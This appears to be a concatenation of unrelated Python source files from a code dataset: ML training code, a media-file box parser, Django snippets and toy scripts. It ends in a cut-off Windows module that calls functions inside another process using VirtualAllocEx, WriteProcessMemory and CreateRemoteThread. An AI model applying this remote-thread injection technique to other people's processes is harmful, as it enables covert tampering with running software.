self.assertContains(response, '"environment": "test_pages"')
self.assertContains(response, '"release": "9.8.7"')
self.assertContains(response, '"sentry_dsn": "https://example.com/sentry/dsn"')
| StarcoderdataPython |
1784496 | <filename>licytacje_api/database.py
import sqlite3
import json
def open_db():
conn = sqlite3.connect('auctions.db')
print("Opened database successfully")
return conn
def create_db_table(table_name: str, schema: dict, conn: sqlite3.Connection):
cursor = conn.cursor()
schema_str = ', '.join([str(k)+' '+str(v) for k, v in schema.items()])
cursor.execute("CREATE TABLE IF NOT EXISTS "+table_name+" ("+schema_str+")")
def populate_db(list_of_dicts: list, table_name: str, conn: sqlite3.Connection):
cursor = conn.cursor()
for dic in list_of_dicts:
cursor.execute("INSERT INTO "+table_name+" VALUES (?, ?)",
[dic['id'], json.dumps(dic, indent=4, sort_keys=True, default=str)])
if __name__ == "__main__":
d = {'id': '1', 'address': 'Horbaczewskiego 21/...0 Wrocław', 'date': 'datetime.datetime(20..., 4, 0, 0)', 'kw': None, 'price': "Decimal('234750.00')", 'url': 'http://www.licytacj...ls/486059'}
try:
with open_db() as con:
table_name = 'auctions'
create_db_table(table_name, {'id': 'varchar(16)', 'data': 'json'}, con)
# populate_db([d], table_name, con)
except sqlite3.IntegrityError as e:
print(e.args)
| StarcoderdataPython |
3263986 | <reponame>SamiIbishi/applied-machine-learning<filename>src/trainer/FaceNetTrainer.py
# General Packages
import json
import os
import time
import typing
import datetime
import numpy as np
# Torch Packages
import torch
import torch.nn.functional as f
# Utilities
from src.utils.utils_tensorboard import MySummaryWriter
from src.utils.utils_optimizer import CustomOptimizer, get_optimizer, get_default_optimizer
from src.utils.utils_loss_functions import CustomLossFunctions, get_loss_function, \
get_default_loss_function
import src.utils.utils_images as img_util
# Template to modify
class FaceNetTrainer:
def __init__(
self,
model,
train_loader,
valid_loader,
test_loader=None,
epochs: int = 10,
logs_per_epoch: int = 10,
image_log_frequency: int = 5,
tensorboard_writer: MySummaryWriter = None,
optimizer: typing.Any = None,
optimizer_args: typing.Optional[typing.Dict[str, typing.Any]]=None,
loss_func: typing.Any = None,
loss_func_args: typing.Optional[typing.Dict[str, typing.Any]]=None,
device: str = 'cpu',
anchor_dict: dict = None
):
# Data loader
self.train_loader = train_loader
self.valid_loader = valid_loader
self.test_loader = test_loader
self.anchor_dict = anchor_dict
# Model
self.model = model
# Computation device [CPU / GPU]
        if device == 'cuda' and torch.cuda.is_available():
            self.device = 'cuda'
            self.model.cuda()
        else:
            # Fall back to CPU so later checks of self.device never hit an unset attribute.
            self.device = 'cpu'
# Get trainable parameters
params_to_update = []
for param in self.model.parameters():
if param.requires_grad:
params_to_update.append(param)
# Hyperparameter - Epoch & log-frequency
self.epochs = epochs
self.log_frequency = int(len(train_loader) / logs_per_epoch)
if self.log_frequency <= 0:
self.log_frequency = 1
self.image_log_frequency = image_log_frequency
# Hyperparameter - Optimizer
self.optimizer_args = optimizer_args
if isinstance(optimizer, str) or isinstance(optimizer, CustomOptimizer):
if optimizer_args is None:
raise ValueError(f'Arguments dictionary for custom optimizer is missing.')
self.optimizer = get_optimizer(optimizer, params_to_update, **optimizer_args)
elif optimizer:
self.optimizer = optimizer
else:
self.optimizer = get_default_optimizer(params_to_update) # default optimizer
# Hyperparameter - Loss Function
self.loss_func_args = loss_func_args
if isinstance(loss_func, str) or isinstance(loss_func, CustomLossFunctions):
if loss_func_args is None:
raise ValueError(f'Arguments dictionary for custom loss function is missing.')
self.loss_func = get_loss_function(loss_func, **loss_func_args)
elif loss_func:
self.loss_func = loss_func
else:
self.loss_func = get_default_loss_function() # default loss function
# write to tensorboard
if tensorboard_writer:
self.tensorboard_writer = tensorboard_writer
def train_epoch(self, epoch) -> None:
"""
Training function for an epoch. Including loss and accuracy calculation.
:param epoch: Current epoch.
:return: None
"""
print(5 * "#" + f" EPOCH {epoch:02d} Start - Training " + 15 * "#")
# Set model in trainings mode
self.model.train()
start_time = time.time()
running_loss = 0
total_loss = 0
for batch_idx, (images, _) in enumerate(self.train_loader):
# Get input from data loader
anchor, positive, negative = images
# Push tensors to GPU if available
if self.device == 'cuda':
anchor, positive, negative = anchor.cuda(), positive.cuda(), negative.cuda()
with torch.set_grad_enabled(True):
# Clear gradients before calculating loss
self.optimizer.zero_grad()
# Extract image embedding via model output
anchor_output, positive_output, negative_output = self.model.forward(anchor,
positive,
negative)
# Calculate loss
triplet_loss = self.loss_func(anchor_output, positive_output, negative_output)
triplet_loss.backward()
# Optimize model parameter
self.optimizer.step()
# Statistics
running_loss += triplet_loss.item() * anchor_output.size(0)
total_loss += triplet_loss.item() * anchor_output.size(0)
# Logging and tensorboard
if batch_idx % self.log_frequency == self.log_frequency - 1 or batch_idx == len(
self.train_loader) - 1:
header = f"[{epoch:02d}/{self.epochs}][{batch_idx}/{len(self.train_loader)}]"
epoch_loss = (running_loss / anchor.size(0)) / (batch_idx % self.log_frequency + 1)
print(f"{header} => running trainings loss: {epoch_loss:.2f}")
if self.tensorboard_writer:
self.tensorboard_writer.log_training_loss(epoch_loss, batch_idx)
running_loss = 0
duration = time.time() - start_time
minutes = round(duration // 60, 0)
seconds = round(duration % 60, 0)
print(5 * "#" + f" EPOCH {epoch:02d} DONE - computation time: "
f"{minutes}m {seconds}s " + 5 * "#")
return total_loss
def evaluate_epoch(self, epoch):
"""
Evaluates the current model accuracy in the current epoch/batch.
:return: Validation accuracy.
"""
# switch to evaluate mode
self.model.eval()
correct_prediction = 0
total_prediction = 0
running_loss = 0
running_dist_ap = 0
running_dist_an = 0
for batch_idx, (images, ids) in enumerate(self.valid_loader):
# Get input from triplet 'images'
anchor, positive, negative = images
# Push tensors to GPU if available
if self.device == 'cuda':
anchor, positive, negative = anchor.cuda(), positive.cuda(), negative.cuda()
# Compute image embeddings
with torch.set_grad_enabled(False):
emb_anchor, emb_positive, emb_negative = self.model.forward(anchor, positive,
negative)
# Calculate loss
triplet_loss = self.loss_func(emb_anchor, emb_positive, emb_negative)
# Statistics
running_loss += triplet_loss.item() * emb_anchor.size(0)
# Distance between Anchor and Positive
dist_ap = f.pairwise_distance(emb_anchor, emb_positive, p=2)
# Distance between Anchor and Negative
dist_an = f.pairwise_distance(emb_anchor, emb_negative, p=2)
# Evaluation and logging
for idx in range(len(dist_ap)):
total_prediction += 1
running_dist_an += dist_an[idx]
running_dist_ap += dist_ap[idx]
if dist_ap[idx] < dist_an[idx]:
correct_prediction += 1
# Logging and tensorboard
if batch_idx % self.log_frequency == self.log_frequency - 1 or batch_idx == len(
self.valid_loader):
header = f"[{epoch:02d}/{self.epochs}][{batch_idx}/{len(self.valid_loader)}]"
# averaging
epoch_loss = (running_loss / anchor.size(0)) / (batch_idx + 1)
running_dist_an = running_dist_an / (
(batch_idx % self.log_frequency + 1) * anchor.size(0))
running_dist_ap = running_dist_ap / (
(batch_idx % self.log_frequency + 1) * anchor.size(0))
print(f"{header} => running validation loss: {epoch_loss:.2f}")
if self.tensorboard_writer:
self.tensorboard_writer.log_custom_scalar("dist_ap/eval", running_dist_ap,
batch_idx)
self.tensorboard_writer.log_custom_scalar("dist_an/eval", running_dist_an,
batch_idx)
running_dist_ap = 0
running_dist_an = 0
if (epoch % self.image_log_frequency == self.image_log_frequency - 1 or
epoch == self.epochs) \
and batch_idx == 0\
and self.tensorboard_writer:
# Print the first batch of images with their distances to tensorboard
fig = img_util.plot_images_with_distances(images=images, dist_an=dist_an,
dist_ap=dist_ap)
self.tensorboard_writer.add_figure("eval/distances", fig, batch_idx)
# Compute acc. Logging and tensorboard.
valid_acc = (100. * correct_prediction) / total_prediction
print(f'Validation accuracy: {valid_acc:.2f}%')
if self.tensorboard_writer:
self.tensorboard_writer.log_validation_accuracy(valid_acc)
return valid_acc
def train(self,
path_to_saved: str = None,
epochs: typing.Optional[int] = None,
log_frequency: typing.Optional[int] = None) -> None:
"""
Fit model on trainings data and evaluate on validation set.
:param path_to_saved:
:param epochs: Number of trainings epochs.
:param log_frequency: Frequency in which information is logged.
:return: None
"""
self.start_time_training = time.time()
if epochs:
self.epochs = epochs
if log_frequency:
self.log_frequency = log_frequency
for epoch in range(1, self.epochs + 1):
epoch_loss = self.train_epoch(epoch)
if self.tensorboard_writer:
self.tensorboard_writer.increment_epoch()
self.evaluate_epoch(epoch)
if (epoch % self.image_log_frequency == self.image_log_frequency - 1 or
epoch == self.epochs) \
and self.tensorboard_writer:
batch = iter(self.valid_loader).next()
self.inference_to_tensorboard(batch)
if epoch_loss < 1:
print(
f"##### Interrupt training because training loss is {epoch_loss} and very good")
break
self.end_time_training = time.time()
if path_to_saved:
self.save_training(path_to_saved)
def inference_to_tensorboard(self, batch, fuzzy_matches: bool = True):
"""
Logs the positives of one batch to tensorboard with the prediction and the inference
:param batch: the batch incl anchors, positives, negatives and the ids
:param fuzzy_matches:
:return:
"""
(images, ids) = batch
if self.tensorboard_writer: # log inference on some pics
self.model.create_anchor_embeddings(anchor_dict=self.anchor_dict)
positives = images[1]
predicted_ids = []
for idx in range(len(ids)):
true_id = ids[idx]
image = positives[idx]
if self.device == "cuda":
image = image.cuda()
(predicted_id, comment) = self.model.inference(image, fuzzy_matches=fuzzy_matches,
use_threshold=False)
predicted_ids.append(predicted_id)
fig = img_util.plot_classes_preds_face_recognition(positives, ids, predicted_ids,
fuzzy_matches)
self.tensorboard_writer.add_figure("inference", fig, 0)
def save_training(self, path_to_saved: str = "./src/saved/trained_models/"):
"""
:param path_to_saved:
:return:
"""
path = path_to_saved
# Validate path to directory 'trained_models'
if not os.path.exists(path):
os.makedirs(path)
# get date/time after model is trained
date = datetime.datetime.now()
trainings_dir = date.strftime('model_date_%Y_%m_%d_time_%H_%M')
trainings_dir_path = os.path.join(path, trainings_dir)
# Validate path to current training directory
if not os.path.exists(trainings_dir_path):
os.makedirs(trainings_dir_path)
# Save model
torch.save(self.model.state_dict(), os.path.join(trainings_dir_path, 'model'))
duration = self.end_time_training - self.start_time_training
minutes = round(duration // 60, 0)
seconds = round(duration % 60, 0)
# Save hyperparameter
hyperparameter = {
"date": date.strftime("%m/%d/%Y, %H:%M:%S"),
"git_commit_id": "<PASSWORD>", # ToDo: manually edit,
"optimizer": str(self.optimizer),
"loss_func": str(self.loss_func),
"epochs": self.epochs,
"batches in train": len(self.train_loader),
"batch size": len(iter(self.train_loader).next()[0][0]),
"total_duration: ": f"{minutes} min {seconds} sec"
}
# model parameter
model_parameter = {
"input_size": self.model.input_size,
"num_features": self.model.num_features,
"num_embedding_dimensions": self.model.num_embedding_dimensions,
"pretrained_model": self.model.pretrained_model
}
if self.optimizer_args:
for opt_arg, opt_arg_value in self.optimizer_args.items():
hyperparameter['optimizer_arg_' + opt_arg] = opt_arg_value
if self.loss_func_args:
for loss_func_arg, loss_func_arg_value in self.loss_func_args.items():
hyperparameter['optimizer_arg_' + loss_func_arg] = loss_func_arg_value
np.save(os.path.join(trainings_dir_path, 'model_parameter.npy'), model_parameter)
# torch.save(hyperparameter, os.path.join(trainings_dir_path, 'hyperparameter.json'))
np.save(os.path.join(trainings_dir_path, 'hyperparameter.npy'), hyperparameter)
torch.save(self.model.anchor_embeddings,
os.path.join(trainings_dir_path, 'anchor_embeddings'))
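# Hedged usage sketch (illustrative only; `model`, the data loaders and `anchor_dict`
# come from the surrounding project and are assumptions here, not defined in this file):
#
#   trainer = FaceNetTrainer(
#       model=model,
#       train_loader=train_loader,
#       valid_loader=valid_loader,
#       epochs=20,
#       optimizer=torch.optim.Adam(model.parameters(), lr=1e-3),
#       loss_func=torch.nn.TripletMarginLoss(margin=1.0),
#       device='cuda',
#       anchor_dict=anchor_dict,
#   )
#   trainer.train(path_to_saved='./src/saved/trained_models/')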
| StarcoderdataPython |
49241 | <reponame>Darklanx/rl-baselines3-zoo
"""
Run multiple experiments on a single machine.
"""
import subprocess
import numpy as np
ALGOS = ["sac"]
ENVS = ["MountainCarContinuous-v0"]
N_SEEDS = 10
EVAL_FREQ = 5000
N_EVAL_EPISODES = 10
LOG_STD_INIT = [-6, -5, -4, -3, -2, -1, 0, 1]
for algo in ALGOS:
for env_id in ENVS:
for log_std_init in LOG_STD_INIT:
log_folder = f"logs_std_{np.exp(log_std_init):.4f}"
for _ in range(N_SEEDS):
args = [
"--algo",
algo,
"--env",
env_id,
"--hyperparams",
f"policy_kwargs:dict(log_std_init={log_std_init}, net_arch=[64, 64])",
"--eval-episodes",
N_EVAL_EPISODES,
"--eval-freq",
EVAL_FREQ,
"-f",
log_folder,
]
args = list(map(str, args))
ok = subprocess.call(["python", "train.py"] + args)
| StarcoderdataPython |
60738 | <reponame>kentoku24/isobmff<filename>isobmff/iinf.py
# -*- coding: utf-8 -*-
from .box import FullBox
from .box import indent
from .box import read_box
from .box import read_int
from .box import read_string
class ItemInformationBox(FullBox):
box_type = 'iinf'
is_mandatory = False
def __init__(self, size, version, flags):
super().__init__(size=size, version=version, flags=flags)
self.item_infos = []
def __repr__(self):
rep = 'entry_count: ' + str(len(self.item_infos)) + '\n'
for item in self.item_infos:
rep += item.__repr__()
return super().__repr__() + indent(rep)
def read(self, file):
count_size = 2 if self.version == 0 else 4
entry_count = read_int(file, count_size)
for _ in range(entry_count):
box = read_box(file)
if not box:
break
if box.box_type == 'infe':
self.item_infos.append(box)
class ItemInfomationEntry(FullBox):
box_type = 'infe'
def __init__(self, size, version, flags):
super().__init__(size=size, version=version, flags=flags)
self.item_id = None
self.item_protection_index = None
self.item_name = None
self.item_extension = None
self.item_type = None
self.content_type = None
self.content_encoding = None
self.uri_type = None
def __repr__(self):
rep = 'item_id: ' + str(self.item_id) + '\n'
rep += 'item_protection_index: ' + \
str(self.item_protection_index) + '\n'
rep += 'item_name: ' + self.item_name
if self.version >= 2:
rep += '\nitem_type: ' + str(self.item_type)
return super().__repr__() + indent(rep)
def read(self, file):
if self.version == 0 or self.version == 1:
self.item_id = read_int(file, 2)
self.item_protection_index = read_int(file, 2)
self.item_name = read_string(file)
self.content_type = read_string(file)
self.content_encoding = read_string(file)
if self.version == 1:
extension_type = read_string(file, 4)
fdel = FDItemInfoExtension()
fdel.read(file)
self.item_extension = fdel
elif self.version >= 2:
if self.version == 2:
self.item_id = read_int(file, 2)
elif self.version == 3:
self.item_id = read_int(file, 4)
self.item_protection_index = read_int(file, 2)
self.item_type = read_string(file, 4)
self.item_name = read_string(file)
if self.item_type == 'mime':
self.content_type = read_string(file)
self.content_encoding = read_string(file)
elif self.item_type == 'uri ':
self.uri_type = read_string(file)
class FDItemInfoExtension(object):
def __init__(self):
self.content_location = None
self.content_md5 = None
self.content_length = None
self.transfer_length = None
self.group_ids = []
def read(self, file):
"""read"""
self.content_location = read_string(file)
self.content_md5 = read_string(file)
self.content_length = read_int(file, 8)
self.transfer_length = read_int(file, 8)
entry_count = read_int(file, 1)
for _ in range(entry_count):
group_id = read_int(file, 4)
self.group_ids.append(group_id)
| StarcoderdataPython |
100518 |
def kIsClicked():
    print("Character moves right")
def hIsClicked():
    print("Character moves left")
keepGoing = True
# boolean = a variable that holds either True or False
while True:
userInput = input("which number do you want to choose? (1~9) type 9 ")
if userInput == "k":
kIsClicked()
elif userInput == "9":
print("Finished")
break
else:
break
| StarcoderdataPython |
3270553 | from django.db import transaction
from django.core.management.base import BaseCommand
import json
from binascii import hexlify
from simplecrypt import encrypt
from events.models import Event
from events.tasks import encrypt_event
class Command(BaseCommand):
    help = 'Encrypts stored events via background tasks - temp fix.'
def add_arguments(self, parser):
parser.add_argument('poll_id', nargs='+', type=int)
def handle(self, *args, **options):
total = Event.objects.count()
c = 0
for e in Event.objects.all():
c += 1
encrypt_event.delay(e.pk, c, total)
| StarcoderdataPython |
1737326 | # -*- coding: utf-8 -*-
import mock
from h.viewpredicates import FeaturePredicate
class TestFeaturePredicate(object):
def test_text(self):
predicate = FeaturePredicate('foo', mock.sentinel.config)
assert predicate.text() == 'feature = foo'
def test_phash(self):
predicate = FeaturePredicate('foo', mock.sentinel.config)
assert predicate.phash() == 'feature = foo'
def test__call__(self):
request = mock.Mock(spec_set=['feature'])
predicate = FeaturePredicate('bar', mock.sentinel.config)
result = predicate(mock.sentinel.context, request)
request.feature.assert_called_once_with('bar')
assert result == request.feature.return_value
| StarcoderdataPython |
3301554 | <filename>Email Slicer/email_slicer.py
email = input('Enter you email: ').strip()
username = email[:email.index('@')]
domain = email[email.index('@') + 1:]
print(f"Your username is {username} and your domain name is {domain}") | StarcoderdataPython |
1676943 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 2 10:28:33 2021
@author: venkateshprasads
Input: nums = [2,7,11,15], target = 9
Output: [0,1]
Output: Because nums[0] + nums[1] == 9, we return [0, 1].
"""
class solution:
    def __init__(self, nums=None, target=None):
        self.nums = nums
        self.target = target
    def twoSum(self, nums: 'list', target: int) -> 'list':
        # Brute force: check every pair (i, j) with i < j so an element is never paired with itself.
        for i in range(len(nums) - 1):
            for j in range(i + 1, len(nums)):
                if nums[i] + nums[j] == target:
                    return [i, j]
a = solution().twoSum([2, 7, 11, 15], 9)
| StarcoderdataPython |
48643 | # encoding: utf-8
"""
This program is free software. It comes without any warranty, to
the extent permitted by applicable law. You can redistribute it
and/or modify it under the terms of the Do What The Fuck You Want
To Public License, Version 2, as published by Sam Hocevar. See
http://sam.zoy.org/wtfpl/COPYING for more details.
TODO: Make this not suck.
"""
import os
import sys as _sys  # RCDLL.__repr__ relies on _sys.maxint
from _ctypes import FUNCFLAG_CDECL as _FUNCFLAG_CDECL,\
FUNCFLAG_STDCALL as _FUNCFLAG_STDCALL,\
FUNCFLAG_PYTHONAPI as _FUNCFLAG_PYTHONAPI,\
FUNCFLAG_USE_ERRNO as _FUNCFLAG_USE_ERRNO,\
FUNCFLAG_USE_LASTERROR as _FUNCFLAG_USE_LASTERROR
from _kernel32 import PLoadLibraryW as PLoadLibrary
from extern import pefile
import functools
from _kernel32 import *
from struct import calcsize as _calcsz
# Utility stuff (decorators/base classes/functions)
def memoize(obj):
"""
From the Python Decorator Library (http://wiki.python.org/moin/PythonDecoratorLibrary):
Cache the results of a function call with specific arguments. Note that this decorator ignores **kwargs.
"""
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
if args not in cache:
cache[args] = obj(*args, **kwargs)
return cache[args]
return memoizer
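# Illustrative example (not used elsewhere in this module): decorating a function caches
# its results per positional-argument tuple.
#
#   @memoize
#   def _slow_square(x):
#       return x * x
#   _slow_square(3)  # computed once
#   _slow_square(3)  # returned from the cache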
def _find_parent_process():
"""
Obtain the process and thread identifiers of the parent process.
BOOL get_parent_process( LPPROCESS_INFORMATION ppi )
{
HANDLE hSnap;
PROCESSENTRY32 pe;
THREADENTRY32 te;
DWORD id = GetCurrentProcessId();
BOOL fOk;
hSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS|TH32CS_SNAPTHREAD, id );
if (hSnap == INVALID_HANDLE_VALUE)
return FALSE;
find_proc_id( hSnap, id, &pe );
if (!find_proc_id( hSnap, pe.th32ParentProcessID, &pe ))
{
CloseHandle( hSnap );
return FALSE;
}
te.dwSize = sizeof(te);
for (fOk = Thread32First( hSnap, &te ); fOk; fOk = Thread32Next( hSnap, &te ))
if (te.th32OwnerProcessID == pe.th32ProcessID)
break;
CloseHandle( hSnap );
ppi->dwProcessId = pe.th32ProcessID;
ppi->dwThreadId = te.th32ThreadID;
return fOk;
}
"""
pid = GetCurrentProcessId()
hSnap = CreateToolhelp32Snapshot(PROC_THREAD_SNAPSHOT, 0)
if hSnap == NULL:
raise WinError('Could not create a Toolhelp32Snapshot')
(fOk, pe) = _find_proc_id(hSnap, pid)
if fOk == FALSE:
raise WinError('Could not find current proc')
ppid = pe.th32ParentProcessID
fOk, ppe = _find_proc_id(hSnap, ppid)
if fOk == FALSE:
raise WinError('Could not find parent proc id')
te = THREADENTRY32()
te.dwSize = SZTHREADENTRY
fOk = Thread32First(hSnap, byref(te))
while fOk != FALSE:
if te.th32OwnerProcessID == ppe.th32ProcessID: break
fOk = Thread32Next(hSnap, byref(te))
if fOk == FALSE:
raise WinError('Could not find thread.')
CloseHandle(hSnap)
return ppe.th32ProcessID, te.th32ThreadID
def _find_proc_id(hSnap, pid):
"""
Search each process in the snapshot for id.
BOOL find_proc_id( HANDLE snap, DWORD id, LPPROCESSENTRY32 ppe )
{
BOOL fOk;
ppe->dwSize = sizeof(PROCESSENTRY32);
for (fOk = Process32First( snap, ppe ); fOk; fOk = Process32Next( snap, ppe ))
if (ppe->th32ProcessID == id)
break;
return fOk;
}
"""
ppe = PROCESSENTRY32()
ppe.dwSize = SZPROCESSENTRY
fOk = Process32First(hSnap, byref(ppe))
while fOk != FALSE:
if ppe.th32ProcessID == pid: break
fOk = Process32Next(hSnap, byref(ppe))
return fOk, ppe
def _bypid(pid):
"""
Find a process and it's main thread by its process ID.
"""
hSnap = CreateToolhelp32Snapshot(PROC_THREAD_SNAPSHOT, 0)
if hSnap == NULL: raise WinError('Could not create a Toolhelp32Snapshot')
(fOk, pe) = _find_proc_id(hSnap, pid)
if fOk == FALSE: raise WinError('Could not find process by id: %d' % pid)
# Find the thread
te = THREADENTRY32()
te.dwSize = SZTHREADENTRY
fOk = Thread32First(hSnap, byref(te))
while fOk != FALSE:
if te.th32OwnerProcessID == pe.th32ProcessID: break
fOk = Thread32Next(hSnap, byref(te))
if fOk == FALSE: raise WinError('Could not find thread.')
CloseHandle(hSnap)
return pe.th32ProcessID, te.th32ThreadID
def _pack_args(*args):
""" Pack multiple arguments into """
class _Args(Structure): pass
fields = []
for i, arg in enumerate(args):
fields.append(('arg%d' % i, type(arg),))
_Args._fields_ = fields
Args = _Args()
for i, arg in enumerate(args):
try:
setattr(Args, 'arg%d' % i, arg)
except:
try:
setattr(Args, 'arg%d' % i, arg.value)
except:
setattr(Args, 'arg%d' % i, arg.contents)
return Args
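# Illustrative sketch of what the helper above builds (not executed here): packing two
# c_ulong values produces an anonymous Structure whose fields mirror the argument order.
#
#   packed = _pack_args(c_ulong(1), c_ulong(2))
#   # packed.arg0 == 1 and packed.arg1 == 2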
_szp1 = lambda a: len(a) + 1
def _isptr(typ):
return hasattr(typ, '_type_') and (typ._type_ == 'P' or type(typ._type_) != str)
def _pynumtyp2ctype(arg, typ=None):
if typ is None: typ = type(arg)
if typ == int:
if arg < 0:
#ctyp = c_short
#if arg > c_short_max or arg < c_short_min:
ctyp = c_int
if arg > c_int_max or arg < c_int_min:
ctyp = c_longlong if arg > c_long_max or arg < c_long_min else c_long
return ctyp
else:
#ctyp = c_ushort
#if arg > c_ushort_max:
ctyp = c_uint
if arg > c_uint_max:
ctyp = c_ulonglong if arg > c_ulong_max else c_ulong
return ctyp
elif typ == long:
if arg < 0:
return c_longlong if arg > c_long_max or arg < c_long_min else c_long
else:
return c_ulonglong if arg > c_ulong_max else c_ulong
elif typ == float:
ctyp = c_float
try: result = ctyp(arg)
except:
ctyp = c_double
try: result = ctyp(arg)
except: ctyp = c_longdouble
return ctyp
else:
raise Exception('Arg doesnt appear to be a number-type.. Arg: %s Type: %s' % (str(arg), str(typ)))
def _carrtype(val, typ, size, num=True):
buf = typ()
larg = len(val) - 1
for i in range(0, size - 1):
if i > larg: continue
if type(val[i]) in [str, unicode] and num:
val[i] = ord(val[i])
buf[i] = val[i]
return buf
def _pychars2ctype(arg, size = None, typ=None):
if typ is None: typ = type(arg)
if size is None: size = len(arg)
if typ == str:
return c_char_p, create_string_buffer(arg, size)
elif typ == unicode:
return c_wchar_p, create_unicode_buffer(arg, size)
elif typ == buffer:
#noinspection PyTypeChecker
argtype = c_ubyte * size
return argtype, _carrtype(list(arg), argtype, size)
elif typ == bytearray:
size += 1
#noinspection PyTypeChecker,PyUnresolvedReferences
argtype = c_byte * size
return argtype, _carrtype(list(arg), argtype, size - 1)
def py2ctype(arg):
""" TODO: Use this in the allocation/argtype stuff in RCFuncPtr """
typ = type(arg)
if typ in [str, unicode, buffer, bytearray]:
ctyp, cval = _pychars2ctype(arg, typ=typ)
return cval
elif typ in [ int, long, float ]:
ctyp = _pynumtyp2ctype(arg, typ)
return ctyp(arg)
elif typ in [list, set, tuple]:
arg = list(arg)
size = len(arg) + 1
argtype = c_int
numtyp = True
# Only going to handle collections of strings, unicode strings, and numbers
for argi in arg:
typ = type(argi)
if typ in [ str, unicode ]:
argtype, dummy = _pychars2ctype(argi, typ=typ)
numtyp = False
break
elif typ in [ long, int, float ]:
argtype = _pynumtyp2ctype(argi, typ)
if typ == float: numtyp = False
break
return _carrtype(arg, argtype * size, size, num=numtyp)
else:
raise Exception('Dont know what to do with arg.\nArg: %s\nType: %s' % (arg, type(arg)))
class _RCFuncPtr(object):
_addr_ = 0
_flags_ = None
_restype_ = None
_funcptr_ = None
_hprocess_ = None
def _valueof(self, arg):
if not hasattr(arg, '_type_'):
return arg
elif hasattr(arg, 'value'):
return arg.value
elif hasattr(arg, 'contents'):
return arg.contents
else:
return arg
#raise Exception('Don\'t know how to get the value of arg.\nType: %s' % type(arg))
def _valtoargtype(self, arg, argtype):
result = 0
if type(arg) in [str, unicode]:
if argtype == c_char_p:
result = create_string_buffer(arg, len(arg) + 1)
elif argtype == c_wchar_p:
result = create_unicode_buffer(arg, len(arg) + 1)
elif argtype._type_ == c_ubyte:
result = (c_ubyte * len(arg) + 1)()
for i, c in enumerate(arg):
result[i] = c
else:
raise Exception('Don\'t know how to convert string, "%s" into type: %s' % (arg, argtype))
# Array type
elif hasattr(argtype, '_length_')\
or type(argtype._type_) != str: # Pointer type
try:
result = cast(arg, argtype)
except:
result = arg
elif hasattr(argtype, 'value'):
try: result = argtype(arg)
except: result = arg
else:
try: result = cast(arg, c_void_p)
except: result = arg
#raise Exception('Don\'t know how to convert arg to argtype.\nArg: %s\nArgtype: %s' % (arg, argtype))
return result
def _alloc_set_var(self, val):
"""
BOOL alloc_set_varA(LPCSTR* buffer, HANDLE hProcess, LPCSTR val)
{
SIZE_T buflen = (lstrlen(val) + 1) * sizeof(const char);
if (!(*buffer = (LPCSTR) VirtualAllocEx(hProcess, NULL, buflen, MEM_COMMIT, PAGE_READWRITE)))
return_error("Could not allocate memory for our test call.");
if (!WriteProcessMemory(hProcess, (LPVOID)*buffer, (LPCVOID)val, (SIZE_T)buflen, NULL))
return_error("Could write to our remote variable..");
return TRUE;
}
"""
buflen = sizeof(val)
buffer = VirtualAllocEx(self._hprocess_, 0L, buflen, MEM_COMMIT, PAGE_READWRITE)
if buffer == NULL:
raise Exception('Could not allocate our remote buffer.')
try:
if WriteProcessMemory(self._hprocess_, LPCVOID(buffer), val, buflen, ULONG_PTR(0)) == FALSE:
raise Exception('Could not write to our remote variable.')
except ArgumentError:
if WriteProcessMemory(self._hprocess_, LPCVOID(buffer), addressof(val), buflen, ULONG_PTR(0)) == FALSE:
raise Exception('Could not write to our remote variable.')
return buffer
def __call__(self, *more): # real signature unknown; restored from __doc__
""" x.__call__(...) <==> x(...) """
funcptr = self._funcptr_
result = DWORD(0L) if not hasattr(funcptr, 'restype') or funcptr.restype is None else funcptr.restype()
lpParameter = NULL
if not hasattr(funcptr, 'noalloc') or not funcptr.noalloc:
if funcptr.argtypes is not None and len(funcptr.argtypes) > 0:
args = []
argcount = len(more)
for i, argtype in enumerate(funcptr.argtypes):
arg = 0
if i >= argcount:
arg = argtype()
elif hasattr(more[i], '_type_'):
if more[i]._type_ == argtype:
arg = more[i]
else:
arg = self._valtoargtype(self._valueof(more[i]), argtype)
else:
arg = self._valtoargtype(more[i], argtype)
args.append(arg)
if argcount > 1:
lpParameter = _pack_args(*args)
else:
lpParameter = args[0]
if hasattr(lpParameter, '_b_needsfree_') and lpParameter._b_needsfree_ == 1 and bool(lpParameter):
lpParameter = self._alloc_set_var(lpParameter)
elif len(more) > 0:
if len(more) == 1:
lpParameter = cast(more[0], c_void_p)
else:
tlen = len(self.argtypes) if hasattr(self, 'argtypes') else 0
more = list(more)
for i, arg in enumerate(more):
if i > tlen: more[i] = py2ctype(arg)
else:
typ = self.argtypes[i]
if typ == c_char_p:
more[i] = create_string_buffer(arg)
elif typ == c_wchar_p:
more[i] = create_unicode_buffer(arg)
elif _isptr(typ):
more[i] = cast(arg,typ)
else:
more[i] = self.argtypes[i](arg)
lpParameter = _pack_args(*more)
hRemoteThread = CreateRemoteThread(
self._hprocess_, NULL_SECURITY_ATTRIBUTES, 0,
cast(self._addr_, LPTHREAD_START_ROUTINE),
lpParameter, 0L, byref(c_ulong(0L))
)
if hRemoteThread == NULL:
if hasattr(lpParameter, '_b_needsfree_') and lpParameter._b_needsfree_ == 1 and bool(lpParameter):
VirtualFreeEx(self._hprocess_, lpParameter, 0, MEM_RELEASE)
CloseHandle(self._hprocess_)
raise WinError('Failed to start our remote thread.')
WaitForSingleObject(hRemoteThread, INFINITE)
GetExitCodeThread(hRemoteThread, cast(byref(result), LPDWORD))
CloseHandle(hRemoteThread)
if hasattr(lpParameter, '_b_needsfree_') and lpParameter._b_needsfree_ == 1 and bool(lpParameter):
VirtualFreeEx(self._hprocess_, lpParameter, 0, MEM_RELEASE)
return result
def __init__(self, offset, funcid, rdll):
self._addr_ = offset
if self._flags_ == _FUNCFLAG_CDECL:
self._funcptr_ = CFUNCTYPE(self._restype_)
elif self._flags_ == _FUNCFLAG_STDCALL:
self._funcptr_ = WINFUNCTYPE(self._restype_)
elif self._flags_ == _FUNCFLAG_PYTHONAPI:
self._funcptr_ = PYFUNCTYPE(self._restype_)
self._funcptr_._func_flags_ = self._flags_
def __nonzero__(self):
""" x.__nonzero__() <==> x != 0 """
return self._funcptr_.__nonzero__()
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
return self._funcptr_.__repr__()
@memoize
def _has(self, key): return key in dir(_RCFuncPtr)
def __setattr__(self, key, value):
if self._has(key):
